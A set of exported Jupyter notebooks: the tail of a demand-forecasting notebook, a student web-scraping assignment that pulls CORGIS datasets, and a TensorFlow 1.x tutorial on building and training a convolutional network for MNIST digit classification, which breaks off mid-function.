pred_ci.iloc[:, 1], color='blue', alpha=.2)
ax.set_xlabel('Date')
ax.set_ylabel('Order_Demand')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
5. ForecastingNow we would like to forecast order demand for the next 50 months. As expected, the further ahead in time we forecast, the more variance there is in the prediction.
###Code
pred_uc = results.get_forecast(steps=50)
pred_ci = pred_uc.conf_int()
ax = y.plot(label='observed', figsize=(14, 7), linewidth=3)
pred_uc.predicted_mean.plot(ax=ax, label='Forecast', linewidth=3)
ax.fill_between(pred_ci.index,
pred_ci.iloc[:, 0],
pred_ci.iloc[:, 1], color='k', alpha=.2)
ax.set_xlabel('Date')
ax.set_ylabel('Order Demand')
plt.legend()
plt.show()
###Output
_____no_output_____ |
_notebooks/2022-03-04- Assingment5.ipynb | ###Markdown
"Assignment 9"> "This is an assignment from week 5 that looks at web scraping data from the corgis website while I explore multiple datasets."- toc:true- branch: master- badges: true- comments: true- author: Michael Iniquez- categories: [fastpages, jupyter] Assignment 5: Web Scraping
###Code
import pandas as pd
import requests
Response = requests.get("https://corgis-edu.github.io/corgis/csv/")
Response
#collapse-output
Response.text
#hide
print(Response.text)
from bs4 import BeautifulSoup
html_string = Response.text
document = BeautifulSoup(html_string, "html.parser")
corgis_list = []
for i in document.find_all("h3"):
corgis_list.append(i.text.strip())
#collapse-output
corgis_list
#collapse-output
document.find_all("h3")
#collapse-output
document()
def pdcorgis(x):
    # Dataset names in the corgis URLs are lowercase
    x = x.lower()
    Response = requests.get("https://corgis-edu.github.io/corgis/csv/" + x + '/')
    html_string = Response.text
    document = BeautifulSoup(html_string, "html.parser")
    corgisdf = None
    # The anchor tag with a 'download' attribute points to the dataset's CSV file
    for i in document.find_all("a"):
        if i.has_attr('download'):
            print(i['href'])
            corgisdf = pd.read_csv("https://corgis-edu.github.io/corgis/csv/" + x + '/' + i['href'])
    return corgisdf
###Output
_____no_output_____
###Markdown
Looking at Major and Avg. Income
###Code
pdcorgis('graduates')
grad_df = pdcorgis('graduates')
grad_df.head()
#collapse-output
grad_df.dtypes
a = grad_df.loc[:10].plot(kind = 'barh', x = 'Education.Major', y = 'Salaries.Median')
a.set_title('First 10 data values and their Median Salary')
###Output
_____no_output_____
###Markdown
This initial examination of the data set shows that the STEM majors make the most in terms of median salary. I would aggregate the data so that all Chemistry majors are grouped into one variable, and I would do the same for each of the other majors. I believe that would work and make sense. Exploring Billionaires dataset
###Code
pdcorgis('billionaires')
bill_df = pdcorgis('billionaires')
bill_df.head()
#collapse-output
bill_df.dtypes
bill_df.sort_values('year')
a = bill_df.loc[:25].plot(kind = 'barh', x = 'company.sector', y = 'rank')
a.set_title("The first 25 values displaying the rank of certain Sectors")
###Output
_____no_output_____
###Markdown
This is important to examine, as not every software company ranks number one. Although the first 3 are software, we see software appear again around rank 5. Nevertheless, it is important to note that in this initial examination of the dataset, software is the wealthiest sector. Looking at Election Data
###Code
pdcorgis("election")
df = pdcorgis("election")
df.iloc[:50].plot(kind = "bar", x = 'Location.State' , y = 'Vote Data.Bernie Sanders.Number of Votes', figsize=(12,6))
###Output
_____no_output_____ |
4_tensorflow_cnn.ipynb | ###Markdown
TensorFlow Tutorial - CNNsIn this tutorial, you will learn how to build a convolutional neural network (CNN) for image classification. We will be working with the well-known MNIST dataset featuring hand-written single digits. The CNNs task is then to identify which digit is shown on a given image.The tutorial is based on the official [TensorFlow example](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/tutorials/mnist/mnist_with_summaries.py). It is meant to teach you the basic tools needed to implement a convolutional architecture in TensorFlow and it additionally shows how to leverage TensorBoard for some visualizations.In the following, we assume familiarity with the TensorFlow tutorial presented in the previous exercise, i.e., you should be aware of TensorFlow's core concepts, such as graph, session, input placeholders, etc.This tutorial consists of: 1. Introduction to CNNs 2. The MNIST Data Set 3. Building the Model 4. TensorBoard 5. Concluding Remarks and Exercises Introduction to CNNs The Convolution OperationA convolution is a mathematical operation and represents an essential building block in image processing tasks. Depending on what filter you use to convolve an image with, you can use convolutions to blur an image (i.e., removing high-frequency noise) ...... detect edges ...... and [many other things](http://setosa.io/ev/image-kernels/). You can think of a convolution as sliding a window, also called _kernel_ or _filter_, over each pixel of an image and computing a dot product between the filter's values and the image's values that the filter is covering. This operation produces one output value for every location on the image over which we slide the filter. Usually, we go through every pixel in the image and position the filter such that its center pixel lies on the image pixel. Hence, for pixels lying on the boundary of the image, we have to pad the image as the filter otherwise "spills over" (more on this later). A visualization of the convolution process looks like this (this and subsequent animations taken from [here](https://github.com/vdumoulin/conv_arithmetic)):Here, blue is the input image, grey is the 3-by-3 filter that we are convolving the input image with and green is the output image. The dashed pixels represent padded regions. Convolutions in Neural NetworksIn the context of CNNs, we are using exactly the same convolution operation, but we think of it in a slightly different way: Instead of producing a desired output image like in traditional image processing tasks (e.g. blurry, edges highlighted, etc.), a filter extracts certain _features_ from a local neighborhood and we store them in _feature maps_, sometimes also called _activation maps_ or simply _channels_. Moreover, we are moving several filters over a given image, so each convolutional layer potentially outputs several of those feature maps. Importantly, the weights of the filter are not fixed - those values are actually what the network must optimize. In other words, the network learns to set up those filters in such a way that they extract features from the images that are most useful for the network to solve the task at hand.The following animation taken from the lecture slides summarizes all this: Types of ConvolutionsWhen adding a convolutional layer, we must decide upon the following: - **Filter Size**: We have to decide how big a filter is, i.e. determine its width and height. Common choices are small, square, and odd, e.g. 3-by-3, 5-by-5, 7-by-7, etc. 
Of course, this depends on the problem you are trying to solve. Increasing the filter sizes increases the amount of trainable parameters. CNNs are very effective models thanks to **weight-sharing** and **repetition of the convolution operation**, which also provide invariance to certain image operations such as translation and rotation. The parameter space can be reduced considerably in comparison to fully connected layers. Choosing huge filter sizes goes against this intuition, and recent research has shown that creating deeper models is generally a better idea than increasing filter sizes. - **Number of Feature Maps**: We should also decide how many feature maps each layer outputs. Again, this design choice depends on the problem. - **Padding**: As mentioned above, when we apply the filter on the boundary of the image, the filter "spills over". Hence, we must decide what to do in these cases. TensorFlow knows two options: _VALID_ or _SAME_. When we choose _VALID_ the filter will only be placed on pixels where it does not "spill over" the boundary. This means that the output image will _not_ have the same size as the input image. On the other hand, _SAME_ applies just enough padding that the output image will be the same size as the input (if the stride is 1). - **Strides**: So far we always assumed that once we computed the output of a filter at a given location, we just move on to the pixel right next to it. We could however also choose to omit some pixels in between. E.g., if we were to compute the convolution only on every other pixel, we would say that we use a stride of 2. This effectively reduces the size of the output image. Sometimes strided convolutions are used instead of pooling layers (a short `tf.nn.conv2d` sketch after this overview illustrates the padding and stride options). The following example shows a convolution with the stride set to 2 on both the vertical and the horizontal axis of the image. - **Dilations**: In dilated convolutions, sometimes also called "à trous", we introduce holes in the filter, i.e. we spread the filter over a wider area but without considering some pixels inside that area in the computation of the dot product. This allows for a **faster growth of the receptive field** in deeper layers than with standard convolutions. The intuition behind this is that it is easier to integrate global context into the convolution operation. The following example shows a dilated convolution with a dilation factor of 2 on both the vertical and horizontal axis of the image. Building Blocks of a CNNCNNs built for classification tasks typically make use of the following types of layers: - **Convolutional Layers**: Layers implementing the actual convolution as explained above. Their outputs are feature maps which are then passed through an activation function in order to introduce non-linearities into the system. Convolutional layers can be seen as extracting features that are passed on deeper into the model, thus enabling the model to learn higher-level features that make the classification task easier. - **Pooling Layers**: Downsampling or pooling layers concentrate the information so that deeper layers focus more on abstract/high-level patterns. You can also use strided convolutions to perform downsampling. A decreased image size also speeds up the processing time in general because fewer convolutions are necessary on subsequent layers. Furthermore, pooling allows for some translation invariance on the input. A common choice is max-pooling, where only the maximum value occurring in a certain region is propagated to the output. 
- **Dense Layers**: A dense or fully-connected layer connects every node in the input to every node in the output. This is the type of layer you already used for the linear regression model in the previous tutorial. If the input dimension is large, the amount of learnable parameters introduced by using a dense layer can quickly explode. Hence, dense layers are usually added on deeper levels of the model, where the pooling operations have already reduced the dimensionality of the data. Typically, the dense layers are added last in a classification model, performing the actual classification on the features extracted by the convolutional layers. As an example, here is the architecture overview of the VGG16 model ([source](https://www.safaribooksonline.com/library/view/machine-learning-with/9781786462961/21266fa5-9e3b-4f9e-b3c6-2ca27a8f8c12.xhtml)). The MNIST Data SetWith this brief recap of convolutional architectures, we are now ready to tackle the problem of hand-written digit classification from images. Let's first have a look at the contents of the MNIST data set. To do so, let's import all the libraries we need for this tutorial and define some useful helper functions.
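As a brief aside, the following minimal sketch (added for illustration, not part of the original tutorial) shows how the padding and stride choices described above translate into `tf.nn.conv2d` arguments; it is independent of the MNIST code below:

```python
import numpy as np
import tensorflow as tf

# One 5x5 gray-scale "image": shape [batch, height, width, channels].
image = tf.constant(np.arange(25, dtype=np.float32).reshape(1, 5, 5, 1))
# One 3x3 filter producing a single feature map: shape [height, width, in_channels, out_channels].
kernel = tf.constant(np.ones((3, 3, 1, 1), dtype=np.float32))

same = tf.nn.conv2d(image, kernel, strides=[1, 1, 1, 1], padding='SAME')       # padded, output stays 5x5
strided = tf.nn.conv2d(image, kernel, strides=[1, 2, 2, 1], padding='VALID')   # no padding, stride 2

with tf.Session() as sess:
    print(sess.run(same).shape)     # (1, 5, 5, 1)
    print(sess.run(strided).shape)  # (1, 2, 2, 1)
```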
###Code
%tensorflow_version 1.x
import tensorflow as tf
from tensorflow.python.util import deprecation
deprecation._PRINT_DEPRECATION_WARNINGS = False
import numpy as np
import matplotlib.pyplot as plt
import math
import os
from tensorflow.examples.tutorials.mnist import input_data
# Tensorboard in Colab environment.
!pip install tensorboardcolab
from tensorboardcolab import *
tbc = TensorBoardColab()
# Visit the URL below after Tensorboard section.
def plot_images(images, cls_true, cls_pred=None):
"""Plot 9 MNIST sample images in a 3x3 sub-plot."""
assert len(images) == len(cls_true) == 9
# Create figure with 3x3 sub-plots.
fig, axes = plt.subplots(3, 3)
fig.subplots_adjust(hspace=0.3, wspace=0.3)
for i,ax in enumerate(axes.flat):
# Plot image.
ax.imshow(images[i].reshape(img_shape), cmap='binary')
# Show true and predicted classes.
if cls_pred is None:
xlabel = "True: {0}".format(cls_true[i])
else:
xlabel = "True: {0}, Pred: {1}".format(cls_true[i], cls_pred[i])
ax.set_xlabel(xlabel)
# Remove ticks
ax.set_xticks([])
ax.set_yticks([])
# Import the data
log_dir = "/tmp/tensorflow/mnist_cnn/logs"
mnist = input_data.read_data_sets(log_dir, one_hot=False, fake_data=False)
# We know that MNIST images are 28 pixels in each dimension.
img_size = 28
# Images are stored in one-dimensional arrays of this length.
img_size_flat = img_size * img_size
# Tuple with height and width of images used to reshape arrays.
img_shape = (img_size, img_size)
# Images are gray-scale, so we only have one image channel
num_image_channels = 1
# Number of classes, one class for each of 10 digits.
num_classes = 10
# Print some stats
print("Size of:")
print("- Training-set:\t\t{}".format(len(mnist.train.labels)))
print("- Test-set:\t\t{}".format(len(mnist.test.labels)))
print("- Validation-set:\t{}".format(len(mnist.validation.labels)))
# Get some sample images from the test set.
images = mnist.test.images[0:9]
# Get the true classes for those images.
cls_true = mnist.test.labels[0:9]
# Plot the images and labels using our helper-function above.
plot_images(images=images, cls_true=cls_true)
###Output
Successfully downloaded train-images-idx3-ubyte.gz 9912422 bytes.
Extracting /tmp/tensorflow/mnist_cnn/logs/train-images-idx3-ubyte.gz
Successfully downloaded train-labels-idx1-ubyte.gz 28881 bytes.
Extracting /tmp/tensorflow/mnist_cnn/logs/train-labels-idx1-ubyte.gz
Successfully downloaded t10k-images-idx3-ubyte.gz 1648877 bytes.
Extracting /tmp/tensorflow/mnist_cnn/logs/t10k-images-idx3-ubyte.gz
Successfully downloaded t10k-labels-idx1-ubyte.gz 4542 bytes.
Extracting /tmp/tensorflow/mnist_cnn/logs/t10k-labels-idx1-ubyte.gz
Size of:
- Training-set: 55000
- Test-set: 10000
- Validation-set: 5000
###Markdown
Building the Model. Let's now have a look at the core of this tutorial, namely how to build the actual CNN that is trained to predict the hand-written number on 28-by-28 gray-scale images. To begin with, when you build a model there are usually some design choices and hyper-parameters that you want to experiment with. Hence, it is good practice to make those parameters configurable through the command line or an external configuration file. TensorFlow provides built-in support for this, called `FLAGS`, so let's define some of those:
###Code
def del_all_flags(FLAGS):
flags_dict = FLAGS._flags()
keys_list = [keys for keys in flags_dict]
for keys in keys_list:
FLAGS.__delattr__(keys)
del_all_flags(tf.flags.FLAGS)
tf.app.flags.DEFINE_string("log_dir", log_dir, "Summaries log directory")
tf.app.flags.DEFINE_string("feature_map_sizes", "32,64,128", "Number of layers to be used and number of feature maps per layer")
tf.app.flags.DEFINE_string("filter_sizes", "5,5,5", "Size of square filters per layer")
tf.app.flags.DEFINE_float("learning_rate", 1e-3, "Learning rate (default: 1e-3)")
tf.app.flags.DEFINE_integer("batch_size", 128, "Batch size (default: 128)")
tf.app.flags.DEFINE_integer("max_steps", 10000, "Number training steps/iterations (default: 1000)")
tf.app.flags.DEFINE_integer("evaluate_every_step", 250, "Evaluate model on validation set after this many steps/iterations (i.e., batches) (default: 50)")
tf.app.flags.DEFINE_string('f', '', 'kernel') # Dummy entry so that colab doesn't complain.
FLAGS = tf.app.flags.FLAGS
print("\nCommand-line Arguments:")
for key in FLAGS.flag_values_dict():
print("{:<22}: {}".format(key.upper(), FLAGS[key].value))
print("")
###Output
Command-line Arguments:
LOG_DIR : /tmp/tensorflow/mnist_cnn/logs
FEATURE_MAP_SIZES : 32,64,128
FILTER_SIZES : 5,5,5
LEARNING_RATE : 0.001
BATCH_SIZE : 128
MAX_STEPS : 10000
EVALUATE_EVERY_STEP : 250
F :
###Markdown
We define some functions that allow us to create `tf.Variables`. Remember that TensorFlow variables are just special tensors that retain their value across different runs of the graph. Additionally, they are trainable, i.e., the optimizer will change their values during backpropagation, so in the end they represent all the trainable parameters of the model that we want to optimize for.
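As a minimal standalone sketch of this behaviour (built in its own graph so it does not touch the model constructed below), a variable keeps and updates its value across `Session.run` calls:

```python
import tensorflow as tf

# Build this toy example in its own graph so it does not pollute the model below.
with tf.Graph().as_default():
    counter = tf.Variable(0, name='counter')         # state that persists across session runs
    increment = tf.assign_add(counter, 1)            # op that updates the variable in place

    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())  # variables must be initialized first
        for _ in range(3):
            print(sess.run(increment))               # prints 1, 2, 3
```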
###Code
def weight_variable(shape):
"""Create a weight variable with appropriate initialization."""
# Initialize variable by drawing from a Gaussian distribution.
    # Here, another popular choice is to use Xavier initializers.
return tf.Variable(tf.truncated_normal(shape, stddev=0.1))
def bias_variable(shape):
"""Create a bias variable with appropriate initialization."""
return tf.Variable(tf.constant(0.1, shape=shape))
def variable_summaries(var):
"""Attach a lot of summaries to a Tensor for TensorBoard visualizations."""
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
###Output
_____no_output_____
###Markdown
Using these functions, we can now define the core of our model. Note that the following functions just create nodes in the computational graph; no actual computation is taking place just yet.
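A tiny standalone example (again in its own graph) of this deferred-execution idea: defining an operation only yields a symbolic `Tensor`, and values appear only once the graph is run in a session:

```python
import tensorflow as tf

with tf.Graph().as_default():
    a = tf.constant([1.0, 2.0, 3.0])
    b = a * 2.0
    print(b)                    # Tensor("mul:0", shape=(3,), dtype=float32) - no values yet
    with tf.Session() as sess:
        print(sess.run(b))      # [2. 4. 6.] - values only exist once the graph is run
```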
###Code
def dense_layer(input_tensor, output_dim, layer_name, act=tf.nn.relu):
"""
Reusable code for making a simple dense layer connected to the last dimension of `input_tensor`.
It does a matrix multiply, bias add, and then uses an activation to nonlinearize. It also sets
up name scoping so that the resultant graph is easy to read, and adds a number of summary ops.
:param input_tensor: The input tensor to this layer.
:param output_dim: The desired output size we want to map to.
:param layer_name: A name for this layer.
:param act: Activation function used on the output of the dense layer.
:return: The activated output of this layer and its weights.
"""
# Adding a name scope ensures logical grouping of the layers in the graph.
with tf.name_scope(layer_name):
# Get the input dimensionality
input_dim = input_tensor.get_shape()[-1].value
# Note that calling `tensor.get_shape()` retrieves the so called static shape of the tensor.
# The static shape is known at compile time. Some tensor dimensions can be variable, i.e.
# they are only defined during runtime. To retrieve the dynamic shape, i.e. the shape of
# a tensor when actually running computations in the graph, we should call `tf.shape(tensor)`
# instead.
# This Variable will hold the state of the weights for the layer
with tf.name_scope('weights'):
weights = weight_variable([input_dim, output_dim])
variable_summaries(weights)
with tf.name_scope('biases'):
biases = bias_variable([output_dim])
variable_summaries(biases)
with tf.name_scope('Wx_plus_b'):
preactivate = tf.matmul(input_tensor, weights) + biases
tf.summary.histogram('pre_activations', preactivate)
activations = act(preactivate, name='activation')
tf.summary.histogram('activations', activations)
return activations, weights
def conv_layer(input_layer, filter_size, num_filters, layer_name, use_pooling=True):
"""
Adds a convolutional layer to `input_layer`. Produces an output tensor of shape
`[batch_size, input_height/k, input_width/k, num_filters]` where `k = 2` if
`use_pooling` is activated or 1 otherwise.
:param input_layer: The input to this layer. Expected is a tensor of shape
`[batch_size, input_height, input_width, input_channels]`
:param filter_size: Width and height of the filter (scalar).
:param num_filters: How many feature maps to produce with this layer.
:param layer_name: A name for this layer.
:param use_pooling: Use 2x2 max-pooling if True.
:return: The output of this layer and the filter weights.
"""
with tf.name_scope(layer_name):
# First determine the input channel size
num_input_channels = input_layer.get_shape()[-1].value
# Shape of the filter-weights for the convolution.
# This format is determined by the TensorFlow API.
shape = [filter_size, filter_size, num_input_channels, num_filters]
# Create new weights aka. filters with the given shape.
weights = weight_variable(shape=shape)
# Create new biases, one for each filter.
biases = bias_variable(shape=[num_filters])
# Create the TensorFlow operation for convolution.
# Note the strides are set to 1 in all dimensions.
# The first and last stride must always be 1,
# because the first is for the image-number and
# the last is for the input-channel.
# But e.g. strides=[1, 2, 2, 1] would mean that the filter
# is moved 2 pixels across the x- and y-axis of the image.
# The padding is set to 'SAME' which means the input image
# is padded with zeroes so the size of the output is the same.
layer = tf.nn.conv2d(input=input_layer,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME')
# Add the biases to the results of the convolution.
# A bias-value is added to each filter-channel.
layer += biases
# Use pooling to down-sample the image resolution?
if use_pooling:
# This is 2x2 max-pooling, which means that we
# consider 2x2 windows and select the largest value
# in each window. Then we move 2 pixels to the next window.
layer = tf.nn.max_pool(value=layer,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
# Rectified Linear Unit (ReLU).
# It calculates max(x, 0) for each input pixel x.
# This adds some non-linearity to the formula and allows us
# to learn more complicated functions.
layer = tf.nn.relu(layer)
# Note that ReLU is normally executed before the pooling,
# but since relu(max_pool(x)) == max_pool(relu(x)) we can
# save 75% of the relu-operations by max-pooling first.
# We return both the resulting layer and the filter-weights
# because we will plot the weights later.
return layer, weights
def flatten_layer(layer):
"""
A helper function to flatten the output of a convolutional layer. As a conv layer
outputs a 4-dimensional tensor, we need to reduce it to 2 dimensions so that
    we can use it as an input to a dense layer.
:param layer: The output of a convolutional layer.
:return: The input layer flattened to have shape `[batch_size, num_features]`
"""
# Get the shape of the input layer.
layer_shape = layer.get_shape()
# The shape of the input layer is assumed to be:
# layer_shape == [num_images, img_height, img_width, num_channels]
# The number of features is: img_height * img_width * num_channels
# We can use a function from TensorFlow to calculate this.
num_features = layer_shape[1:4].num_elements()
# Reshape the layer to [batch_size, num_features].
# Note that we just set the size of the second dimension
# to num_features and the size of the first dimension to -1
# which means the size in that dimension is calculated
# so the total size of the tensor is unchanged from the reshaping.
layer_flat = tf.reshape(layer, [-1, num_features])
# The shape of the flattened layer is now:
# [num_images, img_height * img_width * num_channels]
# Return both the flattened layer and the number of features.
return layer_flat, num_features
###Output
_____no_output_____
###Markdown
With this we can now construct the model. The last thing we need to do is to set up placeholders through which we can feed values into the model. Recall that placeholders are just special tensors for which TensorFlow checks that they have been supplied appropriately whenever running a computation in the graph. Note that the first dimension of each placeholder is `None`. This means that the actual size of that dimension is unknown at compile time and thus can vary at runtime. This is a useful feature, especially for the batch size.
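To see what the `None` dimension buys us, here is a small self-contained sketch (separate from the tutorial's graph) that feeds batches of two different sizes through the same placeholder:

```python
import tensorflow as tf
import numpy as np

with tf.Graph().as_default():
    x = tf.placeholder(tf.float32, [None, 3], name='x')  # batch size left open
    row_sums = tf.reduce_sum(x, axis=1)

    with tf.Session() as sess:
        print(sess.run(row_sums, feed_dict={x: np.ones((2, 3))}))  # batch of 2 -> [3. 3.]
        print(sess.run(row_sums, feed_dict={x: np.ones((5, 3))}))  # batch of 5 -> [3. 3. 3. 3. 3.]
```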
###Code
# Create input placeholders
with tf.name_scope('input'):
# This is the format how we read MNIST images.
images_flat = tf.placeholder(tf.float32, [None, img_size_flat], name='x-input')
# We reshape this so that we can feed it directly into a conv layer.
data_placeholder = tf.reshape(images_flat, [-1, img_size, img_size, num_image_channels])
# Also create a placeholder for the target labels
label_placeholder = tf.placeholder(tf.int32, [None], name='y-input')
# Extract design parameters from the command line
feature_map_sizes = list(map(int, FLAGS.feature_map_sizes.split(',')))
filter_sizes = list(map(int, FLAGS.filter_sizes.split(',')))
assert len(filter_sizes) == len(feature_map_sizes)
# Build the actual model
next_in = data_placeholder
weights = []
layer_outs = []
for i, (num_out_channels, filter_size) in enumerate(zip(feature_map_sizes, filter_sizes)):
next_in, w = conv_layer(next_in, filter_size, num_out_channels, 'conv{}_layer'.format(i), use_pooling=True)
weights.append(w)
layer_outs.append(next_in)
# Flatten the output
out_flat, _ = flatten_layer(next_in)
# Add a dense layer with 10 output neurons, i.e. one for every class from 0-9
logits, _ = dense_layer(out_flat, num_classes, 'dense_layer', act=tf.identity)
probs = tf.nn.softmax(logits)
###Output
_____no_output_____
###Markdown
Note that we did not use an activation function on the output of the dense layer. Generally speaking, it is not always reasonable to use an activation function on the last layer, depending on the distribution of your outputs. For example, if you used a `tf.nn.tanh` activation on your output layer, all outputs would come to lie between -1 and 1. While an activation function on the outputs is a trick to define the output range for free, it is inherently biased. In other words, the distribution of output values does not match with the shape of the activation function. Depending on your problem, this might or might not make sense. For our case, we want the outputs of the model to be probabilities, i.e., the model should tell us what is the probability that a certain image belongs to each of the 10 classes. For this, we can use the softmax activation function, defined as follows:$$\sigma(\mathbf{z})_j = \frac{e^{\mathbf{z}_j}}{\sum_{k=1}^K e^{\mathbf{z}_k}}$$where $\mathbf{z}$ is our $K$-dimensional output vector `logits` and $K$ refers to the number of classes that we are trying to predict, i.e. $K=10$ in our case. The softmax function essentially squashes its input between 0 and 1 and makes sure that all $K$ values sum up to 1. In other words, it produces a valid probability distribution over the number of classes.So, how come we did not supply `tf.nn.softmax` to our dense layer above? The reason is that when we feed softmax-activated values to our loss function, we introduce numerical instabilities that destabilize the training. The loss function measures how good the prediction of our network is. Ideally, if we feed an image depicting a hand-written 3 to our model, we want it to assign a probability of 1 to the class 3 and probabilities of 0 to all other classes. Thus, for every image we have a target distribution $q$, which is just a one-hot encoding of its label, and an estimated probability distribution $p$ which is the output of the model. A one-hot encoding of a label is simply a vector of zeros that has exactly one entry showing 1 corresponding to the index of that label. For example, the one-hot encoding of label 3 looks like this:$$\left[0, 0, 0, 1, 0, 0, 0, 0, 0, 0 \right]^T \in \mathbb{R}^{10}$$The only thing left is now to find a measure of the distance between those two distributions, i.e. how closely $p$ resembles the one-hot encoding $q$. For this, we can use the cross-entropy:$$H(p, q) = H(p) + D_{KL}(p || q) = -\sum\limits_x p(x) \log q(x)$$where $H(p)$ is the entropy of $p$ and $D_{KL}$ is the Kullback-Leibler Divergence. You can see from this formula that if the predicted probability $p$ is exactly a one-hot encoding, $H(p, q)$ will be 0, because the entropy $H(p)$ of a one-hot vector is 0 and the KL divergence will also be 0 because $p$ exactly matches $q$.The problem with the cross-entropy, as mentioned before, is that it is numerically unstable and can produce `inf` values during training. Hence, TensorFlow produces a more stable version which takes as input the logits, _not_ the softmax activated values. This is why we did not choose an activation function for the outputs of the dense layer.
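To make these formulas concrete, here is a short NumPy check with purely illustrative numbers: the softmax turns the logits into a valid probability distribution, and the cross-entropy against a one-hot target reduces to the negative log-probability assigned to the true class (which is what `tf.nn.sparse_softmax_cross_entropy_with_logits` computes in a numerically stable way):

```python
import numpy as np

logits = np.array([2.0, 1.0, 0.1])                   # raw model outputs for 3 classes
softmax = np.exp(logits) / np.sum(np.exp(logits))    # squash into probabilities
print(softmax, softmax.sum())                        # e.g. [0.659 0.242 0.099], sums to 1.0

one_hot_target = np.array([1.0, 0.0, 0.0])           # true class is class 0
cross_entropy = -np.sum(one_hot_target * np.log(softmax))
print(cross_entropy, -np.log(softmax[0]))            # both ~0.417
```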
###Code
# Loss: Cross-Entropy
with tf.name_scope('cross_entropy'):
# So here we use tf.nn.softmax_cross_entropy_with_logits on the
# raw outputs of the nn_layer above, and then average across
# the batch.
cross_entropy_loss = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=label_placeholder))
tf.summary.scalar('cross_entropy_loss', cross_entropy_loss)
###Output
_____no_output_____
###Markdown
Now that we defined the model and the loss, we must also choose the optimizer. Before doing so, it might be a good idea to check how many trainable parameters we've created with the model definition above. This is both a sanity check and also gives you an intuition about the capacity of the model.
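Before running the helper below, we can also count the parameters by hand. The numbers here assume the default flags defined above (feature maps 32, 64, 128, all 5x5 filters, 2x2 pooling with 'SAME' padding on 28x28 inputs):

```python
# conv layers: filter_h * filter_w * in_channels * out_channels + biases
conv1 = 5 * 5 * 1 * 32 + 32        #    832
conv2 = 5 * 5 * 32 * 64 + 64       #  51,264
conv3 = 5 * 5 * 64 * 128 + 128     # 204,928

# 2x2 max-pooling with 'SAME' padding: 28 -> 14 -> 7 -> 4
flat_features = 4 * 4 * 128        # 2,048

# final dense layer: inputs * classes + biases
dense = flat_features * 10 + 10    # 20,490

print(conv1 + conv2 + conv3 + dense)  # 277,514 - matching the count printed below
```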
###Code
def count_trainable_parameters():
"""Counts the number of trainable parameters in the current default graph."""
tot_count = 0
for v in tf.trainable_variables():
v_count = 1
for d in v.get_shape():
v_count *= d.value
tot_count += v_count
return tot_count
print("Number of trainable parameters: {}".format(count_trainable_parameters()))
###Output
Number of trainable parameters: 277514
###Markdown
With this, it is time to define our optimizer.
###Code
# Create a variable to contain a counter for the global training step.
global_step = tf.Variable(1, name='global_step', trainable=False)
# Optimization operation: SGD (Stochastic Gradient Descent)
with tf.name_scope('train'):
# This operation automatically increases the `global_step` by 1 every time it is called
train_step = tf.train.GradientDescentOptimizer(FLAGS.learning_rate).minimize(
cross_entropy_loss, global_step=global_step)
# Additionally want to monitor the accuracy of the training, not just the cross-entropy value.
with tf.name_scope('accuracy'):
with tf.name_scope('correct_predictions'):
#predictions = tf.argmax(logits, 1, name="predictions")
correct_predictions = tf.nn.in_top_k(logits, label_placeholder, 1)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32))
tf.summary.scalar('accuracy', accuracy)
###Output
_____no_output_____
###Markdown
At this point we are almost ready to start the training. The only thing left to do is start the session (hopefully on the GPU), add some helper functions to feed data into the model and prepare some summary writers so that we can monitor the progress in TensorBoard.
###Code
# Create the session
sess = tf.InteractiveSession()
# Tensorboard
train_writer = tbc.get_deep_writers("single_layer_model/train")
train_writer.add_graph(sess.graph)
valid_writer = tbc.get_deep_writers("single_layer_model/valid")
valid_writer.add_graph(sess.graph)
# Initialize all variables
sess.run(tf.global_variables_initializer())
# To be able to see something in tensorboard, we must merge summaries to one common operation.
# Whenever we want to write summaries, we must request this operation from the graph.
# Note: creating the file writers should happen after the session was launched.
summaries_merged = tf.summary.merge_all()
def feed_dict(train_mode):
"""Make a TensorFlow feed_dict: maps data onto placeholders."""
if train_mode:
xs, ys = mnist.train.next_batch(FLAGS.batch_size)
else:
xs, ys = mnist.validation.images, mnist.validation.labels
return {images_flat:xs, label_placeholder:ys}
def do_train_step(num_steps, summary_op):
"""Perform as many training steps as specified and may be evaluate on validation set."""
for i in range(num_steps):
step = tf.train.global_step(sess, global_step)
if step % FLAGS.evaluate_every_step == 0:
# Record summaries and test-set accuracy
summary, acc_valid = sess.run([summary_op, accuracy], feed_dict=feed_dict(False))
valid_writer.add_summary(summary, step)
            print('[{}] Accuracy Training [{:.3f}], Validation [{:.3f}]'.format(step, acc_train, acc_valid))
# Record train set summaries, and train
summary, acc_train, _ = sess.run([summary_op, accuracy, train_step], feed_dict=feed_dict(True))
train_writer.add_summary(summary, step)
###Output
_____no_output_____
###Markdown
Now let's train this model for a couple of steps.
###Code
do_train_step(1001, summaries_merged)
train_writer.flush()
valid_writer.flush()
###Output
[250] Accuracy Training [0.768], Validation [0.750]
[500] Accuracy Training [0.855], Validation [0.820]
[750] Accuracy Training [0.885], Validation [0.883]
[1000] Accuracy Training [0.906], Validation [0.906]
###Markdown
In TensorBoard you will see the training loss, the distribution of weight & bias parameter values and our graph. You can also see that the accuracy on the validation set steadily increases. Sometimes it might be interesting to see some visualizations of the learned convolutional filter weights or the outputs of a layer. Let's define some helper functions to do that.
###Code
def plot_conv_weights(session, weights, input_channel=0):
"""Helper-function for plotting convolutional weights."""
# Assume weights are TensorFlow ops for 4-dim variables
# e.g. weights_conv1 or weights_conv2.
# Retrieve the values of the weight-variables from TensorFlow.
# A feed-dict is not necessary because nothing is calculated.
w = session.run(weights)
# Get the lowest and highest values for the weights.
# This is used to correct the colour intensity across
# the images so they can be compared with each other.
w_min = np.min(w)
w_max = np.max(w)
# Number of filters used in the conv. layer.
num_filters = w.shape[3]
# Number of grids to plot.
# Rounded-up, square-root of the number of filters.
num_grids = math.ceil(math.sqrt(num_filters))
# Create figure with a grid of sub-plots.
fig, axes = plt.subplots(num_grids, num_grids)
# Plot all the filter-weights.
for i, ax in enumerate(axes.flat):
